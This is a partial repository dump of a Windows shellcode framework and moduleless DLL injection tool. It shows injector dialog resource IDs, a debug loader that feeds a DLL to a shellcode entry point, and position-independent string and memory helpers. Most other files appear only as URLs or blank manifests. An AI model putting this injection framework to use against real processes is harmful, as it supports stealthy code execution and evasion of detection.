--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/TestShellcodeDlg.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/TestShellcodeDlg.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/res/TestShellcode.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/res/TestShellcode.ico
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/res/TestShellcode.rc2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/res/TestShellcode.rc2
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by TestShellcode.rc
4 | //
5 | #define IDM_ABOUTBOX 0x0010
6 | #define IDD_ABOUTBOX 100
7 | #define IDS_ABOUTBOX 101
8 | #define IDD_TESTSHELLCODE_DIALOG 102
9 | #define IDR_MAINFRAME 128
10 | #define IDC_RICHEDIT21_SHELLCODE 1000
11 | #define IDC_EDIT_PROCESS_ID 1001
12 | #define IDC_BUTTON_INJECT 1002
13 | #define IDC_BUTTON_SHELL 1003
14 | #define IDC_EDIT_API 1004
15 | #define IDC_BUTTON_GENERATEHASH 1005
16 | #define IDC_BUTTON_CALCHASH 1005
17 | #define IDC_EDIT_HASH 1006
18 | #define IDC_EDIT_DLL_PATH 1007
19 | #define IDC_BUTTON_INJECT_DLL 1008
20 | #define IDC_BUTTON1 1009
21 | #define IDC_BUTTON_LOAD_DLL 1009
22 |
23 | // Next default values for new objects
24 | //
25 | #ifdef APSTUDIO_INVOKED
26 | #ifndef APSTUDIO_READONLY_SYMBOLS
27 | #define _APS_NEXT_RESOURCE_VALUE 129
28 | #define _APS_NEXT_COMMAND_VALUE 32771
29 | #define _APS_NEXT_CONTROL_VALUE 1010
30 | #define _APS_NEXT_SYMED_VALUE 101
31 | #endif
32 | #endif
33 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/stdafx.cpp
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/stdafx.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestShellcode/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestShellcode/targetver.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/clear.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | echo ----------------------------------------------------
3 | echo By MoreWindows (http://blog.csdn.net/MoreWindows)
4 | echo Press any key to delete all files with ending:
5 | echo *.idb *.ncp *.obj *.pch *.tmp *.sbr
6 | echo *.tmp *.pdb *.bsc *.ilk *.ncb
7 | echo *.sdf *.dep *.ipch *.tlog *.opt
8 | echo There are Visual C++ and Visual Studio junk
9 | echo ----------------------------------------------------
10 | pause
11 | del /F /S /Q *.idb *.ncp *.obj *.pch *.sbr *.tmp *.pdb *.bsc *.ilk *.ncb *.opt *.sdf *.dep *.ipch
12 | pause
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/hhl_shellcodeframe.exe.embed.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/hhl_shellcodeframe.exe.embed.manifest.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/hhl_shellcodeframe.exe.embed.manifest.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Debug/hhl_shellcodeframe.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/GetRing3ApiAddr.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/GetRing3ApiAddr.bin
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/Release/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/GetRing3ApiAddr.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/Release/GetRing3ApiAddr.bin
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/cmd.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | cmd.exe
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/hhl_shellcodeframe.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/sh_helloworld.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/Release/sh_helloworld.exe
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/Release/sh_helloworld.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/ShellCode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/ShellCode.bin
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/cmd.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | cmd.exe
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sh_helloworld", "hhl_shellcodeframe.vcproj", "{B0E6C01A-2E12-48C9-BB9A-49405143A91D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|Win32.Build.0 = Debug|Win32
14 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|Win32.ActiveCfg = Release|Win32
15 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.suo
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.vcproj
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.vcproj.LF-20161216IWOX.Administrator.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/hhl_shellcodeframe.vcproj.pxysocket-PC.pxysocket.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/main.c:
--------------------------------------------------------------------------------
1 | #include "shellcode.h"
2 | #include "shellcode_ntapi_utility.h"
3 | #include "nativeapi.h"
4 |
5 |
6 | void main()
7 | {
8 |
9 | #ifdef HHL_DEBUG
10 | SHELL_CODE_PARAM ShellCodeParam;
11 | FILE *fp;
12 | int nLength;
13 | UCHAR* pFileBase;
14 | wchar_t* lpReserved;
15 | char* lpProcName;
16 | wchar_t* lpRunCmd = NULL;
17 |
18 | fp = fopen("c:\\testdll.dll", "rb");
19 |
20 | if(fp)
21 | {
22 | nLength = filelength(fileno(fp));
23 | pFileBase = (char*)malloc(nLength+1);
24 | if(pFileBase)
25 | {
26 | memset(pFileBase, 0, nLength+1);
27 | }
28 | fread(pFileBase, nLength, 1, fp);
29 | fclose(fp);
30 |
31 | }
32 | else
33 | {
34 | return;
35 | }
36 |
37 | InitApiHashToStruct();
38 |
39 | ShellCodeParam.lpFileBase = pFileBase;
40 |
41 | lpReserved = (wchar_t*)malloc(MAX_PATH);
42 | memset(lpReserved, 0, MAX_PATH);
43 | wsprintf((LPSTR)lpReserved, L"Hello World!");
44 | ShellCodeParam.lpReserved = lpReserved;
45 |
46 | lpProcName = (char*)malloc(MAX_PATH);
47 | memset(lpProcName, 0, MAX_PATH);
48 | sprintf(lpProcName, "RunDll");
49 | ShellCodeParam.lpProcName = lpProcName;
50 |
51 | lpRunCmd = (wchar_t*)malloc(MAX_PATH);
52 | memset(lpRunCmd, 0, MAX_PATH);
53 | wsprintf(lpRunCmd, L"-a aaaaaaaaaaaa -u uuuuuuuuuuuuuu");
54 | ShellCodeParam.lpRunCmd = lpRunCmd;
55 |
56 | ShellCode_Start(ShellCodeParam);
57 |
58 | if(lpRunCmd)
59 | free(lpRunCmd);
60 |
61 | if(lpProcName)
62 | free(lpProcName);
63 |
64 | if(lpReserved)
65 | free(lpReserved);
66 |
67 | if(pFileBase)
68 | free(pFileBase);
69 | #else
70 | InitApiHashToStruct();
71 | #endif
72 | }
73 |
74 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/nativeapi.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/nativeapi.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/shellcode.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/shellcode.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/shellcode_ntapi_utility.c:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | #include "shellcode.h"
5 | #include "shellcode_ntapi_utility.h"
6 | #include "nativeapi.h"
7 |
8 |
9 | //注意写shellcode关闭 security cookie
10 |
11 | #define Shellcode_Final_End ShellCode_Ntapi_Utility_End
12 |
13 | #ifdef HHL_DEBUG
14 | extern PShellData lpData;
15 | #else
16 |
17 | #endif
18 |
19 |
20 |
21 |
22 |
23 | int sh_strlen(const char *str)
24 | {
25 | int len = 0;
26 | while (*str ++ != '/0')
27 | ++ len;
28 | return len;
29 | }
30 |
31 | int my_sh_strcmp(const char *dst, const char *src)
32 | {
33 | int ch1, ch2;
34 | do
35 | {
36 | if ( ((ch1 = (unsigned char)(*(dst++))) >= 'A') &&(ch1 <= 'Z') )
37 | ch1 += 0x20;
38 | if ( ((ch2 = (unsigned char)(*(src++))) >= 'A') &&(ch2 <= 'Z') )
39 | ch2 += 0x20;
40 | } while ( ch1 && (ch1 == ch2) );
41 | return(ch1 - ch2);
42 | }
43 |
44 | char * my_sh_strlwr(char *s)
45 | {
46 | char *str;
47 | char c1=0x0;
48 | str = s; //记录首地址位置,没有必要判断空值!
49 | while(*str != '\0')
50 | {
51 | c1=*str;
52 | if(*str > 'A' && *str < 'Z'){ //大写字母则进行转换!
53 | *str += 'a'-'A';
54 | }
55 | str++;
56 | }
57 | return s;
58 | }
59 |
60 | char * my_sh_strupr(char *str)
61 | {
62 | char *p = str;
63 | while (*p != 0)
64 | {
65 | if(*p >= 'a' && *p <= 'z')
66 | *p -= 0x20;
67 | p++;
68 | }
69 | return str;
70 | }
71 |
72 |
73 | char* my_sh_stristr(char* pString, char* pFind)
74 | {
75 | my_sh_strlwr(pString);
76 | my_sh_strlwr(pFind);
77 | return my_sh_strstr(pString,pFind);
78 | }
79 |
80 | int my_sh_strlen ( char* str )
81 | {
82 | int len=0;
83 | for (len = 0; *str; str++ )
84 | {
85 | len++;
86 | }
87 | return len;
88 |
89 | } // End of FUNCTION "strlen"
90 |
91 | int my_sh_stricmp(char *dst, char *src)//用于不区分大小写比较字符串是否相同
92 | {
93 | int ch1, ch2;
94 | do
95 | {
96 | if ( ((ch1 = (unsigned char)(*(dst++))) >= 'A') &&(ch1 <= 'Z') )
97 | ch1 += 0x20;
98 | if ( ((ch2 = (unsigned char)(*(src++))) >= 'A') &&(ch2 <= 'Z') )
99 | ch2 += 0x20;
100 | } while ( ch1 && (ch1 == ch2) );
101 | return(ch1 - ch2);
102 | }
103 |
104 | //char p[8]="" p[0]的值是0,后面7个都是随机数。
105 | //char p[8]={0} p[0]~p[7]全都是0
106 |
107 | ULONG my_sh_wcslen (wchar_t * wcs)
108 | {
109 | const wchar_t *eos = wcs;
110 |
111 | while( *eos++ ) ;
112 |
113 | return( (ULONG)(eos - wcs - 1) );
114 | }
115 |
116 |
117 |
118 |
119 | char* my_sh_strstr (char * str1,char * str2)//搜素大小写敏感
120 | {
121 | char *cp = (char *) str1;
122 | char *s1, *s2;
123 |
124 | if ( !*str2 )
125 | return((char *)str1);
126 |
127 | while (*cp)
128 | {
129 | s1 = cp;
130 | s2 = (char *) str2;
131 |
132 | while ( *s1 && *s2 && !(*s1-*s2) )
133 | s1++, s2++;
134 |
135 | if (!*s2)
136 | return(cp);
137 |
138 | cp++;
139 | }
140 |
141 | return(NULL);
142 | }
143 |
144 | int my_sh_wcsicmp(wchar_t * dst1,wchar_t * src1) //wchar用于不区分大小写比较字符串是否相同
145 | {
146 | int ch1, ch2;
147 | ULONG len1,len2;
148 | ULONG i,j;
149 | PUCHAR p1,p2,z1,z2;
150 | char dst[256]={0};
151 | char src[256]={0};
152 | p1=(PUCHAR)dst1;
153 | p2=(PUCHAR)src1;
154 |
155 | len1=my_sh_wcslen(dst1);
156 | len2=my_sh_wcslen(src1);
157 |
158 | for (i=0,j=0;i= 'A') &&(ch1 <= 'Z') )
171 | ch1 += 0x20;
172 | if ( ((ch2 = (unsigned char)(*(z2++))) >= 'A') &&(ch2 <= 'Z') )
173 | ch2 += 0x20;
174 | } while ( ch1 && (ch1 == ch2) );
175 | return(ch1 - ch2);
176 | }
177 |
178 | wchar_t* my_sh_wcscat (wchar_t* dst,wchar_t* src)
179 | {
180 | wchar_t * cp = dst;
181 | while( *cp )
182 | cp++; /* find end of dst */
183 | while( *cp++ = *src++ ) ; /* Copy src to end of dst */
184 | return( dst ); /* return dst */
185 |
186 | }
187 |
188 | char* my_sh_strcat (char * dst,const char * src)
189 | {
190 | char * cp = dst;
191 | while( *cp )
192 | cp++; /* find end of dst */
193 | while( *cp++ = *src++ ) ; /* Copy src to end of dst */
194 | return( dst ); /* return dst */
195 |
196 | }
197 |
198 |
199 |
200 |
201 | int my_sh_memcmp(void* pv1,void* pv2,size_t cb)
202 | {
203 | size_t i;
204 | int d;
205 | for (i=0, d=0; i < cb && !d; i++)
206 | d = (*(const BYTE *)pv1) - (*(const BYTE *)pv2);
207 | return d;
208 | }
209 |
210 | void* my_sh_memcpy(void* pvDest,void* pvSrc,size_t cb)
211 | {
212 | size_t i=0;
213 | for (i=0; i < cb; i++)
214 | ((BYTE *)pvDest)[i] = ((const BYTE *)pvSrc)[i];
215 | return pvDest;
216 | }
217 |
218 | void* my_sh_memset(void* pv,int c,size_t cb)
219 | {
220 | size_t i=0;
221 | for (i=0; i < cb; i++)
222 | ((BYTE *)pv)[i] = (BYTE)c;
223 | return pv;
224 | }
225 | void my_sh_zeromem(PVOID Destination,SIZE_T Length)
226 | {
227 | my_sh_memset(Destination,0,Length);
228 | }
229 |
230 |
231 |
232 | BOOLEAN Is64Os()
233 | {
234 | #ifndef HHL_DEBUG
235 | //进行shellcode的重定位
236 | DWORD offset=ReleaseRebaseShellCode();
237 | PShellData lpData= (PShellData)(offset + (DWORD)Shellcode_Final_End);//生成shellcode时候恢复回来
238 | #endif
239 | SYSTEM_INFO si;
240 | lpData->xGetNativeSystemInfo(&si);
241 | if (si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64 ||
242 | si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_IA64 )
243 | {
244 | return TRUE;
245 | }
246 | else
247 | {
248 | return FALSE;
249 | }
250 | }
251 |
252 | void ShellCode_Ntapi_Utility_End()
253 | {
254 | int i=0;
255 | i=i+1;
256 | return;
257 | }
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/hhl_shellcodeframe/shellcode_ntapi_utility.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/hhl_shellcodeframe/shellcode_ntapi_utility.h
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/DLLtest.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/DLLtest.cpp
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/DLLtest.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/DLLtest.vcproj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/DLLtest.vcproj.DESKTOP-AS29ISP.YYYYY.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/DLLtest.vcproj.storm-PC.storm.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/DLLtest.dll.embed.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/DLLtest.dll.embed.manifest.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/DLLtest.dll.embed.manifest.res
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/DLLtest.dll.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/DLLtest.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/DLLtest.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/DLLtest.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/DLLtest.pch
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/dllmain.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/dllmain.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/mt.dep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/mt.dep
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Debug/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Debug/vc90.pdb
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | 动态链接库:DLLtest 项目概述
3 | ========================================================================
4 |
5 | 应用程序向导已为您创建了此 DLLtest DLL。
6 |
7 | 本文件概要介绍组成 DLLtest 应用程序的
8 | 的每个文件的内容。
9 |
10 |
11 | DLLtest.vcproj
12 | 这是使用应用程序向导生成的 VC++ 项目的主项目文件,
13 | 其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
14 |
15 | DLLtest.cpp
16 | 这是主 DLL 源文件。
17 |
18 | 此 DLL 在创建时不导出任何符号。因此,在生成此 DLL 时
19 | 将不会产生 .lib 文件。如果希望此项目
20 | 成为其他某个项目的项目依赖项,则需要
21 | 添加代码以从 DLL 导出某些符号,
22 | 以便产生一个导出库,或者,也可以在项目“属性页”对话框中的
23 | “链接器”文件夹中,将“常规”属性页上的
24 | “忽略输入库”属性设置为“是”。
25 |
26 | /////////////////////////////////////////////////////////////////////////////
27 | 其他标准文件:
28 |
29 | StdAfx.h, StdAfx.cpp
30 | 这些文件用于生成名为 DLLtest.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
31 |
32 | /////////////////////////////////////////////////////////////////////////////
33 | 其他注释:
34 |
35 | 应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
36 |
37 | /////////////////////////////////////////////////////////////////////////////
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/DLLtest.dll.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/DLLtest.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/DLLtest.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/DLLtest.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/DLLtest.pch
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/dllmain.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/dllmain.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/mt.dep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/mt.dep
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/Release/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/Release/vc90.pdb
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/dllmain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/dllmain.cpp
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/stdafx.cpp
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/stdafx.h
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/targetver.h
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/DLLtest.dll.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
